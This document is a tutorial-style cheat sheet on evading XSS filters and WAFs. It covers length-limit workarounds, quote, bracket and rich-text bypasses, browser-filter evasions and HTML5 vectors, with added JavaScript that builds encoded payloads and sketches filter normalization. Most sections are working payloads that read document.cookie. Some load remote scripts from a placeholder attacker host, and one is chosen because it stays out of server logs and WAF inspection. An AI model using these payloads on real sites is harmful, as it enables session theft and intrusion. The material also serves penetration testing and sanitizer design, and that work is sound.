# 0x01 XSS: bypassing the WAF

## Bypassing the XSS character-count limit

When an XSS bug cannot be exploited effectively because the injection point only allows a handful of characters, the limit itself has to be worked around.

### Other controllable data in the HTML context

If the page with the XSS bug has other controllable data in its HTML context, JS can read that data and run it through eval, document.write, innerHTML or similar, which breaks the character limit at the XSS point.

```html
<div id="x"> controllable "safe" data </div>
<limited_xss_point>alert(1);</limited_xss_point>
```

The XSS point is length-limited, so on its own it can only pop an alert. Instead, escape-encode the XSS payload and emit it as harmless-looking data at the controllable position (which is not length-limited), then execute that data from the XSS point. `x` resolves to the element through named property access on `window`, so no `getElementById` call is needed.

```html
<div id="x">alert%28document.cookie%29%3b</div> <!-- escape-encoded payload -->
<limited_xss_point>eval(unescape(x.innerHTML));</limited_xss_point>
```

Length: 28 + len(id).
If sources such as document.URL are not usable but an unlimited number of `<p>` elements is controllable, the code can be split across them and inserted one statement at a time. The first title attribute opens `<script>` and a `/*` comment; every later title closes the comment, contributes one statement and reopens it, so all the markup between two titles (the closing quote, the `data-comment` attribute, `</p> <p ...`) is swallowed as comment text:

```html
<p class="comment" title=""><script>/*" data-comment='{"id":1}'></p>
<p class="comment" title="*/x=new Array();/*" data-comment='{"id":1}'></p>
<p class="comment" title="*/x[0]='a';/*" data-comment='{"id":1}'></p>
<p class="comment" title="*/x[1]='l';/*" data-comment='{"id":1}'></p>
<p class="comment" title="*/x[2]='e';/*" data-comment='{"id":1}'></p>
<p class="comment" title="*/x[3]='r';/*" data-comment='{"id":1}'></p>
<p class="comment" title="*/x[4]='t';/*" data-comment='{"id":1}'></p>
<p class="comment" title="*/x[5]='(';/*" data-comment='{"id":1}'></p>
<p class="comment" title="*/x[6]='1';/*" data-comment='{"id":1}'></p>
<p class="comment" title="*/x[7]=')';/*" data-comment='{"id":1}'></p>
<p class="comment" title="*/y=x.join('');/*" data-comment='{"id":1}'></p>
<p class="comment" title="*/eval(y);/*" data-comment='{"id":1}'></p>
<p class="comment" title="*/</script>" data-comment='{"id":1}'></p>
```
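As an added example (not from the original notes), the JavaScript below generates the `<p title=...>` chain above for an arbitrary payload and then reproduces what the browser's script engine receives: everything between `<script>` and `</script>`, with the markup between the title attributes swallowed by the `/* */` comments. It also carries a small helper for the URL-tail variant, computing the offset that `eval(document.URL.substr(N))` needs. The function names (`buildCommentChain`, `fuse`, `stagerOffset`) and the sample URL are my own assumptions; only the shape of each `<p>` element is taken from the page.

```javascript
// Added example, not from the original notes. Builds the <p title> comment
// chain for any payload and replays what the JS engine would receive.
// Assumptions: each title is reflected unescaped and followed by the same
// data-comment attribute as on the page; the payload contains no single quote.

function pTag(title) {
  return `<p class="comment" title="${title}" data-comment='{"id":1}'></p>`;
}

// One JS statement per element: open <script> and a comment, then for each
// character close the comment, emit x[i]='c';, and reopen the comment, so the
// markup between two title attributes always sits inside /* ... */.
function buildCommentChain(payload) {
  const titles = ['<script>/*', '*/x=new Array();/*'];
  [...payload].forEach((ch, i) => titles.push(`*/x[${i}]='${ch}';/*`));
  titles.push("*/y=x.join('');/*", '*/eval(y);/*', '*/</script>');
  return titles.map(pTag).join(' ');
}

// The HTML parser hands the engine everything between <script> and </script>.
function extractScriptText(html) {
  const start = html.indexOf('<script>') + '<script>'.length;
  const end = html.indexOf('</script>', start);
  return html.slice(start, end);
}

// Drop /* ... */ blocks; what remains is the effective statement list.
function stripBlockComments(js) {
  return js.replace(/\/\*[\s\S]*?\*\//g, '');
}

// Run the effective code with eval replaced by a recorder: returns the
// statements the engine executes and the string that reaches eval.
function fuse(html) {
  const effective = stripBlockComments(extractScriptText(html));
  const executed = [];
  new Function('eval', 'var x, y;' + effective)(s => executed.push(s));
  return { effective, executed };
}

// URL-tail variant: the offset N for eval(document.URL.substr(N)) so that the
// substring is exactly the payload appended to the end of the URL.
function stagerOffset(url, payload) {
  const n = url.lastIndexOf(payload);
  if (n < 0 || n + payload.length !== url.length) {
    throw new Error('payload must be the tail of the URL');
  }
  return n;
}

// Constructed sample run.
const chain = buildCommentChain('alert(1)');
const result = fuse(chain);
// result.effective: "x=new Array();x[0]='a';...x[7]=')';y=x.join('');eval(y);"
// result.executed:  ["alert(1)"]
const offset = stagerOffset('http://www.xxx.com/1.php?x=1&alert(document.cookie)',
                            'alert(document.cookie)');            // 29
```

`fuse` shadows `eval` with a recorder, so the reassembled string is captured rather than executed; the effective statement list is exactly the thirteen-element chain shown on the page.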
### Data in the URL

When the HTML context offers nothing else, use the URL: data in the URL is unconditionally controllable. Put the code to execute in the last parameter of the URL, then fetch it from the XSS point via document.URL, location.href or similar and execute it.

```html
http://www.xxx.com/1.php?x=1...&alert(document.cookie)
<!-- assuming the code starts at character 80 -->
<limited_xss_point>eval(document.URL.substr(80));</limited_xss_point>   <!-- 30 chars -->
<limited_xss_point>eval(location.href.substr(80));</limited_xss_point>  <!-- 31 chars -->
<limited_xss_point>eval(document.URL.slice(80));</limited_xss_point>    <!-- 29 chars -->
<limited_xss_point>eval(location.href.slice(80));</limited_xss_point>   <!-- 30 chars -->
```

The hash member of the location object returns everything after the `#`. The value starts with `#`, so slice from 1. Length: 29. The fragment is never sent to the server, so this variant also keeps the payload out of server logs and out of anything a server-side WAF inspects.

```html
http://www.xxx.com/1.php?x=1...#alert(document.cookie)
<limited_xss_point>eval(location.hash.slice(1));</limited_xss_point>
```
### JS context

Use functions that already exist in the page's JS context to get past the length limit. With a script loader already on the page:

```js
function loads(url){ ... document.body.appendChild(script); }
```
```html
<limited_xss_point>loads('http://xxx.com/x');</limited_xss_point>
```

Length: len(function name) + len(url) + 5.

With a function that issues an HTTP request and returns the response body:

```js
function get(url){ ... return x.responseText; }
```
```html
<limited_xss_point>eval(get('http://xxx.com/x'));</limited_xss_point>
```

Length: len(function name) + len(url) + 11.
### document.referrer

Link to the vulnerable page from a page on your own domain and carry the payload in that page's URL; the vulnerable page then reads its referrer and executes the code. This needs a referrer: when the victim arrives from the attacker's page, the referrer is the attacker's URL.

Attacker page:
```html
http://www.a.com/attack.html?...&alert(document.cookie)
<a href="http://www.xssedsite.com/xssed.php">go</a>
```

Vulnerable page:
```html
<limited_xss_point>eval(document.referrer.slice(80));</limited_xss_point>
```

### clipboardData

Write the payload to the clipboard, then read and execute it in the vulnerable page.

Attacker page:
```html
<script> clipboardData.setData("text", "alert(document.cookie)"); </script>
```

Vulnerable page:
```html
<limited_xss_point>eval(clipboardData.getData("text"));</limited_xss_point>
```

Only works in IE before version 7; from IE 7 on, the browser prompts before letting script read the clipboard.

### window.name

Setting the current window's name directly has no special-character restrictions. Set it, then navigate straight to the vulnerable page; the payload travels in the name property and is executed there.

Attacker page:
```html
<script> window.name = "alert(document.cookie)"; location.href = "http://www.xssedsite.com/xssed.php"; </script>
```

Vulnerable page:
```html
<limited_xss_point>eval(name);</limited_xss_point>
```

Length: 11. Note that current browsers clear window.name when a navigation crosses sites, which limits this to same-site redirects today.
## XSS quote bypass

Use a regex literal `/.../` instead of a quoted string:

```html
<script>alert(/1/)</script>
<iframe/onload=alert(/1/)>
<img src=x onerror=alert(/1/)>
<p onmouseover=alert(/1/)>xxx</p>
```

### String.fromCharCode

fromCharCode encodes the quotes in the exploit code as character codes; it has to be combined with eval:

```html
<script>alert('1')</script>
<script>eval(String.fromCharCode(97,108,101,114,116,40,39,49,39,41))</script>
```

The second form decodes to `alert('1')`.
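As an added example (not part of the original notes), here is a naive quote/keyword blacklist of the kind these tricks defeat, beside the two transformations above (regex literal and `String.fromCharCode`), so the effect can be checked offline. The filter rules, the candidate payload list and the helper names are constructed for illustration.

```javascript
// Added example, not from the original notes: a naive blacklist of the kind
// the quote tricks defeat, and the transformations checked against it.
// Filter rules, payload list and names are constructed for illustration.

// Sample filter: reject anything containing a quote or the word "script".
function naiveQuoteFilter(input) {
  return !/['"]/.test(input) && !/script/i.test(input);
}

// Wrap arbitrary JS as eval(String.fromCharCode(...)) so the result contains
// no quote characters at all; the quotes come back only at run time.
function toFromCharCode(js) {
  const codes = [...js].map(c => c.charCodeAt(0));
  return `eval(String.fromCharCode(${codes.join(',')}))`;
}

// Reverse the wrapper without executing it (what a reviewer or a smarter
// filter would do): pull out the code list and rebuild the string.
function decodeFromCharCode(encoded) {
  const m = /^eval\(String\.fromCharCode\(([\d,]*)\)\)$/.exec(encoded);
  if (!m) throw new Error('not a fromCharCode wrapper');
  return String.fromCharCode(...m[1].split(',').map(Number));
}

// Candidate payloads in the order the notes present them.
const candidates = {
  quoted:    "<img src=x onerror=alert('1')>",       // plain quotes
  scriptTag: '<script>alert(/1/)</script>',          // regex literal, but <script>
  regexLit:  '<img src=x onerror=alert(/1/)>',       // regex literal in a handler
  charCode:  `<img src=x onerror=${toFromCharCode("alert('1')")}>`,
};

// Names of the candidates the blacklist lets through.
function survivingPayloads() {
  return Object.keys(candidates).filter(k => naiveQuoteFilter(candidates[k]));
}

// Constructed sample run.
// toFromCharCode("alert('1')")
//   -> "eval(String.fromCharCode(97,108,101,114,116,40,39,49,39,41))"
// survivingPayloads() -> ["regexLit", "charCode"]
```

The encoder reproduces the exact code list from the page; the blacklist blocks the quoted and `<script>` forms and passes both transformed ones, which is the point of the technique and the reason a filter has to decode before matching.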
## XSS angle-bracket bypass

Use event handlers such as onerror, onmouseover and onload. This still needs `<`, `>` and `=`, so it only helps when nothing but the word `script` is filtered:

```html
<img src=x onerror=alert(/1/)>
<p onmouseover=alert(/1/)>xxx</p>
<frameset onload=alert(/1/)>
<body onload=alert(/1/)>
```

### style and expression

Cross-site through a style attribute (IE only):

```html
<div style="width:expression(alert('1'));">
```

### JavaScript pseudo-protocol

IE only:

```html
<img src=javascript:alert('1')>
```

## XSS bracket bypass

When the goal is stealing cookies and spreading (an XSS worm) rather than a single alert, pull the exploit code in from an external file via src and keep it there; the external file's extension need not be .js:

```html
<script src='1.js'></script>
```

### hex and dec encoding

Characters the filter matches on can be written as hex or decimal HTML entities (for a single quote, `&#x27;` and `&#39;`). The two lines below are the rendered result of the hex-encoded and decimal-encoded forms and are identical once the browser decodes them:

```html
<div style="width:expression(alert('1'))">1</div>
<div style="width:expression(alert('1'))">1</div>
```
## XSS filter (Filter) bypass

Browser XSS filters target reflected XSS; other types are largely unaffected. Both browser-side filters discussed here are gone now (IE's XSS Filter shipped only with IE and legacy Edge, and Chrome removed the XSS Auditor in version 78), so these bypasses matter mainly against server-side filters that copied their heuristics.

### IE Filter bypass

`<a href=>`: for reflected XSS, the a tag together with `sc%0aript` gets past the filter, but the user must click the link, and an address in href on a different domain triggers filtering:

```html
<a href="xss.php?a=<sc%0aript>alert(/1/)</script>">
```

### utf7

Done with a UTF7-BOM; on a fully patched system it only succeeds when the response header declares the encoding as utf-7:

```
%2BACIAPgA8-script%2BAD4-alert%28/1/%29%2BADw-%2Fscript%2BAD4APAAi-&oe=Windows-31J
```

### Flash

On the www.b.com domain, iframe the Flash XSS file from www.a.com; when the victim opens www.b.com, the XSS on the www.a.com domain fires and its data can be read. From a's point of view this is an ordinary Flash XSS, except that it is initiated by a browser on another origin.

```html
<iframe/src="http://www.b.com/1.swf?get-data=(function(){location.href=%22javascript:'<script>alert(document.cookie)</script>'%22})()"></iframe>
```

On Chrome this can crash the browser; use the following instead:

```html
<iframe/src="http://www.b.com/1.swf?get-data=(function(){alert(document.cookie)})()"></iframe>
```

### Chrome Filter

data protocol:

```
?vuln=<a href="javascript:alert(document.cookie);">click</a>                            // blocked
?vuln=<a href="javascript:void(0)">click</a>                                            // bypass
?vuln=<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgnMScpPC9zY3JpcHQ+">click</a>  // bypass
```

The base64 body decodes to `<script>alert('1')</script>`.
## XSS rich-text bypass

Tags and attributes that rich-text filters commonly block: object, applet, base, link, meta, import, embed, vmlframe, iframe, script, style, isindex, form, textarea, javascript:, vbscript:, onload, onerror, on*.

If the filter strips blocked tags in a single pass, nest them so the leftover pieces reassemble into the tag:

```html
<ifra<iframe>me>...</ifra</iframe>me>
<s<script>cript>...</s</script>cript>
```

expression only executes in IE, so the following is limited to IE. CSS escapes hide the keyword from a string match (`\0065` is the CSS escape for `e`, `\6e` for `n`):

```html
<div style="width:expression(alert(/1/))">1</div>
<div style="width:\0065xpression(alert(/1/))">1</div>
<div style="width:\0065xpressio\6e(alert(/1/))">1</div>
```

tab, newline, whitespace and `/** **/` comments also break keyword matching; again basically IE only:

```html
<div style="width:exp/** **/ression(alert(/1/))">1</div>
```

object tag: base64-encode the data attribute to get the key strings past the filter. object is also a tag that filters often forget:

```html
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgvaW5zaWdodC1sYWJzLyk8L3NjcmlwdD4=">
```

### HTML5

Use new HTML5 tags and attributes to get around the filter: button, video, audio, article, footer, nav, autocomplete, autofocus, pattern, ...

```html
<input onfocus=write(1) autofocus>
<video poster=javascript:alert(1)//></video>
```

IE's comment syntax:

```html
<!--[if IE]><img src=# width=0 height=0 onerror=alert(/ourren_demo/)><![endif]-->
<comment><img src="</comment><img src=x onerror=alert(/ourren_demo/)//">
```
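As an added example (not from the original notes), the JavaScript below shows the normalization a rich-text filter has to do before matching keywords, run against the bypass payloads above: stripping blocked tags until the output stops changing (so `<ifra<iframe>me>` cannot reassemble), decoding CSS escapes and comments before looking for `expression(`, and decoding percent-encoding, whitespace and base64 `data:` bodies before classifying an href. The functions and the blocked-tag list are my own illustrative implementation, not any product's, and `java%0ascript:` is a constructed input.

```javascript
// Added example, not from the original notes: the normalization a rich-text
// filter must do before keyword matching, tried against the payloads above.
// Blocked-tag list, function names and the java%0ascript: input are my own.

const BLOCKED_TAGS = ['iframe', 'script', 'object', 'embed', 'style'];
const TAG_RE = new RegExp(`</?(?:${BLOCKED_TAGS.join('|')})\\b[^>]*>`, 'gi');

// Naive filter: one regex pass. Removing <iframe> from <ifra<iframe>me>
// leaves <iframe>, so the tag survives.
function stripTagsOnce(html) {
  return html.replace(TAG_RE, '');
}

// Fixed version: repeat until nothing changes, so fragments cannot reassemble.
function stripTagsUntilStable(html) {
  let prev, cur = html;
  do { prev = cur; cur = stripTagsOnce(cur); } while (cur !== prev);
  return cur;
}

// Decode CSS escapes (\0065 -> e, \6e -> n), drop /* */ comments and all
// whitespace, then lower-case: exp/** **/ression and \0065xpressio\6e
// both become expression.
function normalizeCss(value) {
  return value
    .replace(/\\([0-9a-f]{1,6})\s?/gi, (_, hex) => String.fromCodePoint(parseInt(hex, 16)))
    .replace(/\/\*[\s\S]*?\*\//g, '')
    .replace(/\s+/g, '')
    .toLowerCase();
}

function cssHasExpression(value) {
  return normalizeCss(value).includes('expression(');
}

// Classify an href/src value: percent-decode, remove whitespace and control
// characters (browsers ignore them inside a scheme), then look at the scheme.
// For data: URLs, decode a base64 body and scan it for script.
function classifyUrl(raw) {
  let url = raw;
  try { url = decodeURIComponent(raw); } catch (e) { /* keep raw on bad escapes */ }
  const compact = url.replace(/[\s\x00-\x1f]/g, '');
  const scheme = compact.toLowerCase().split(':')[0];
  if (scheme === 'javascript' || scheme === 'vbscript') return 'script-scheme';
  if (scheme === 'data') {
    const m = /^data:([^,]*),([\s\S]*)$/i.exec(compact);
    let body = m ? m[2] : '';
    if (m && /;base64/i.test(m[1])) body = Buffer.from(body, 'base64').toString('utf8');
    return /<script|javascript:|on\w+\s*=/i.test(body) ? 'data-with-script' : 'data';
  }
  return 'other';
}

// Constructed sample run.
// stripTagsOnce('<ifra<iframe>me>x</ifra</iframe>me>')        -> '<iframe>x</iframe>'
// stripTagsUntilStable('<ifra<iframe>me>x</ifra</iframe>me>') -> 'x'
// cssHasExpression('width:\\0065xpressio\\6e(alert(/1/))')    -> true
// classifyUrl('java%0ascript:alert(1)')                        -> 'script-scheme'
// classifyUrl('data:text/html;base64,PHNjcmlwdD5hbGVydCgnMScpPC9zY3JpcHQ+') -> 'data-with-script'
```

The single-pass `stripTagsOnce` is the bug the nested-tag payloads exploit; the `normalizeCss` and `classifyUrl` steps are what turn the escape, comment and `data:` tricks above into plain keyword matches. A real sanitizer should parse the HTML rather than regex it, but the order of operations (decode first, match second) is the same.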